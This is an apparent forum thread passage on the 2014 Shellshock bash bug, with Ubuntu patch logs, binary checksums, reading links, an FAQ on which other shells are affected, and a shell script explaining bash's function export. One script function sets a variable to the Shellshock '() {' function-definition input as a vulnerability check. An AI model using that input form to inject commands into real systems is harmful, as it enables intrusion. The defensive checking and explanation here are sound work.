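The checksum only proves the file is the one the announcement describes; the announcement itself is the trust anchor, so take the list from the signed mailing-list post and not from the mirror directory, and still let rpm check the package signature (rpm --checksig) against the project's GPG key before installing.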
Type(Type) 2014/9/27 15:57 (Since 2014/9/27 14:33)

Related ShellShock References



Type(Type) 2014/9/27 14:40

Ubuntu 10.04/12.04/14.04 has new updates



Code:


$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash

$ md5sum /bin/bash
d63ff62f142e76205e89e4a4de553fec  /bin/bash

$ apt-get upgrade
[14:38] > apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be upgraded:
  bash grub-common
2 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 2,715 kB of archives.
After this operation, 0 B of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://archive.ubuntu.com/ubuntu/ precise-updates/main bash amd64 4.2-2ubuntu2.3 [641 kB]
Get:2 http://archive.ubuntu.com/ubuntu/ precise-updates/main grub-common amd64 1.99-21ubuntu3.17 [2,074 kB]
Fetched 2,715 kB in 2s (1,129 kB/s)
(Reading database ... 29737 files and directories currently installed.)
Preparing to replace bash 4.2-2ubuntu2.2 (using .../bash_4.2-2ubuntu2.3_amd64.deb) ...
Unpacking replacement bash ...
Processing triggers for man-db ...
Setting up bash (4.2-2ubuntu2.3) ...
update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode.
(Reading database ... 29737 files and directories currently installed.)
Preparing to replace grub-common 1.99-21ubuntu3.16 (using .../grub-common_1.99-21ubuntu3.17_amd64.deb) ...
Unpacking replacement grub-common ...
Processing triggers for ureadahead ...
Processing triggers for man-db ...
Setting up grub-common (1.99-21ubuntu3.17) ...


$  ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 25 14:50 /bin/bash




$ md5sum /bin/bash
5ee533c7cd3a8246b4a3d7a29ffbe0b2 /bin/bash (Ubuntu 12.04 LTS x86_64 bash)

$ md5sum /bin/bash
eb8a956c0a1164b84262505a629e8a1f /bin/bash (Ubuntu 14.04 LTS x86_64 bash)
Type(Type) 2014/9/28 10:24


bash update 09/28



Code:

$ apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
  bash
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 576 kB of archives.
After this operation, 8192 B of additional disk space will be used.
Do you want to continue? [Y/n] y
Preparing to unpack .../bash_4.3-7ubuntu1.4_amd64.deb ...
Unpacking bash (4.3-7ubuntu1.4) over (4.3-7ubuntu1.3) ...
Processing triggers for man-db (2.6.7.1-1) ...
Processing triggers for install-info (5.2.0.dfsg.1-2) ...
Setting up bash (4.3-7ubuntu1.4) ...
update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode

$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1021112  Sep 27 16:04 /bin/bash

$ md5sum /bin/bash
b81de36b3ef3bb64229833c055560c0f  /bin/bash

$ bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.


service(staff) 2014/10/9 13:52

David Wheeler's investigation essay on Shellshock (2014/10/08)




Recommended reading
=> http://www.dwheeler.com/essays/shellshock.html

More further reading:
https://host-project.org/content/are-you-open-being-shell-shocked
http://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx
http://en.wikipedia.org/wiki/Shellshock

http://www.futuresouth.us/wordpress/?p=5 (Yahoo! suspected of having been compromised)




Most frequently asked Shellshock questions (ash, tcsh, csh, mksh)



Q: Is the shell (not bash!) on our such-and-such embedded box affected by this problem?

Ans1:
=> If the system uses a Busybox environment, then in theory you don't need to worry; the Busybox shell is "ash", which does not have this problem
=> http://en.wikipedia.org/wiki/Almquist_shell


Ans2:
=> If it is Android OS, then in theory you don't need to worry; Android uses "mksh"
=> http://www.all-things-android.com/content/mirbsd-korn-shell-android-shell


Ans3:
==> Other shells such as "csh" and "tcsh" are generally NOT within the scope of this incident,
unless you have specifically patched them;
because this bash bug is caused by a special function import/export feature,
other shells that do not have this feature should in theory be fine.
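Added example, not part of the post above: a way to see the function import/export feature that Ans3 refers to, and the change in how exported function names are handled that the Red Hat advisory earlier in the thread points to (its Knowledgebase link). Each function takes the bash binary to inspect as its first argument; the function names, the test function "f" and the assumed bash in PATH are constructed for the example.

```shell
#!/bin/sh
# How bash's function export works (added example; not from the thread).
# Each function takes the bash binary to inspect as $1 (default "bash") and prints
# its finding on stdout; an empty result from the import checks means "not imported".

# Name of the environment entry that `export -f f` creates in a child's environment.
# An unpatched bash used the bare function name ("f"), which is why any variable whose
# value started with "() {" was treated as a function; patched builds use a reserved
# form instead, e.g. BASH_FUNC_f%% (upstream) or BASH_FUNC_f() (early Red Hat builds).
exported_function_envname() {
    b=${1:-bash}
    "$b" -c 'f() { echo hi; }; export -f f; env' 2>/dev/null \
        | grep -E '^(f|BASH_FUNC_f(%%|\(\)))=\(\)' | sed 's/=.*//'
}

# The legitimate path still works after the patch: a child bash imports a function
# that its parent exported with `export -f`. Prints "function".
child_imports_exported_function() {
    b=${1:-bash}
    "$b" -c 'f() { echo hi; }; export -f f; "$0" -c "type -t f"' "$b" 2>/dev/null
}

# The Shellshock input: an ordinary variable (think HTTP_USER_AGENT set by mod_cgi) whose
# value merely starts with "() {". An unpatched bash prints "function" here because it
# imported the definition (and ran anything after the closing brace); a patched bash
# prints nothing because it only imports the reserved BASH_FUNC_* form.
plain_variable_import() {
    b=${1:-bash}
    env f='() { echo hi; }' "$b" -c 'type -t f' 2>/dev/null
}

printf 'env entry for "export -f f": %s\n' "$(exported_function_envname bash)"
printf 'child sees exported f:       %s\n' "$(child_imports_exported_function bash)"
printf 'plain variable imported:     %s\n' "$(plain_variable_import bash)"
```

This is also the practical meaning of the advisory's warning: anything that built function definitions into the environment by hand (wrappers that set "name=() { ...}" and then exec bash) must switch to the reserved name form, because a patched bash ignores the old one. Shells without the feature at all, such as the csh/tcsh/ash/mksh cases above, have nothing to import in the first place.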


